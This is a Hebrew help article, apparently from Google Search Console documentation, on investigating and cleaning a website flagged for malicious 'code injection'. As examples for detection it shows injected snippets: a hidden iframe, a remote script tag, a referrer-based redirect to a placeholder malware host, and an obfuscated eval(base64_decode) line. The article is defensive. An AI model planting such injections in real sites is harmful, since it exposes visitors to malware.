סוג הידבקות בתוכנה זדונית: החדרת קוד

מה המשמעות של דפים המופיעים ב-Google Search Console עם סימון של סוג ההידבקות בתוכנה זדונית "החדרת קוד"?

משמעות הסימון היא שדפים באתר שלך השתנו כך שהם כוללים קוד זדוני, כגון iframe לאתר זדוני.

למידע כללי נוסף על תוכנות זדוניות, ראה הערכת הנזק (פריצה עם תוכנה זדונית).

כיצד אוכל לחקור את ההידבקות בסוג התוכנה הזדונית "החדרת קוד"?

ראשית, הימנע משימוש בדפדפן להצגת דפים נגועים מהאתר שלך. מאחר שתוכנות זדוניות מתפשטות לעתים קרובות על ידי ניצול פגיעויות של הדפדפן, פתיחת דף שנגוע בתוכנה זדונית בדפדפן עלולה לגרום נזק למחשב.

מומלץ שתשתמש ב-cURL או ב-Wget כדי לבצע בקשות HTTP (לדוגמה, כדי לאחזר דף) על-מנת לעמוד על טיב ההתנהגות הבעייתית. הכלים הבאים הזמינים בחינם מסייעים באבחון כתובות אתרים להפניה מחדש, ומציעים את הגמישות לכלול מידע על הגורם המפנה ועל סוכן המשתמש. הצגת תוכן זדוני רק למשתמשים בעלי סוכן משתמש או גורם מפנה ספציפיים מאפשרת להאקר להתמקד ב"אנשים אמתיים" יותר ולהימנע טוב יותר מזיהוי על ידי בעלי אתרים וסורקי תוכנות זדוניות. (כדי להשתמש בכלים אלה, האתר צריך להיות במצב מקוון.)

לדוגמה:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
כגון
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

בשלב הבא, התחבר למערכת הקבצים. בדוק את כל המשאבים הכותבים אל כתובות האתר הנגועות ב"החדרת קוד". הנה כמה דוגמאות להחדרות של קוד זדוני:

  • iframe לאתר זדוני
  • <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript או שפת סקריפטים אחרת הקוראת לסקריפטים מאתר זדוני ומריצה אותם
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • סקריפט שמפנה מחדש את הדפדפן לאתר זדוני
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • קוד זדוני שמטושטש כדי למנוע זיהוי
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • קובצי אובייקטים משותפים שמיועדים לכתוב באופן אקראי קוד מזיק לסקריפטים שלכאורה אינם אמורים להזיק
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

בדוק את כל קטעי הקוד שעלולים להזיק המופיעים באתר. מומלץ לחפש מילים כמו [iframe] כדי למצוא קוד iframe. מילות מפתח אחרות שעשויות להועיל הן "script"‏, "eval" ו-"unescape". לדוגמה, במערכות מבוססות Unix:

$grep -irn "iframe" ./ | less

כיצד ניתן לנקות את האתר מתוכנה זדונית מסוג "החדרת קוד"?

כשאתה מוכן לניקוי האתר (שלב 7 בתהליך השחזור 'עזרה בנושא אתר פרוץ'), תוכל להחליף את הקבצים הנגועים בגיבוי התקין האחרון או שתוכל להסיר את החדרת הקוד מכל דף ומכל פונקציות או קובצי הסקריפט הקשורות. אם שינית קובצי תצורה של שרת, ייתכן שיהיה עליך להפעיל מחדש את שרת האינטרנט כדי שהשינויים ייכנסו לתוקף.

לתשומת לבך, הסרת הקוד הזדוני אינה מטפלת בשורש הבעיה של נקודת התורפה שאפשרה להאקר לפגוע באתר שלך. מבלי לטפל בשורש הבעיה, האתר עלול להיפגע שוב בעתיד. לקבלת מידע נוסף על ניקוי האתר כולו, ולא רק סוג זה של תוכנה זדונית, ראה עזרה בנושא אתרים פרוצים, ועיין בנושא הספציפי "הערכת הנזק למערכת הקבצים" בשלב 5: הערכת הנזק (פריצה עם תוכנה זדונית).

האם המאמר היה מועיל?
איך נוכל לשפר את המאמר?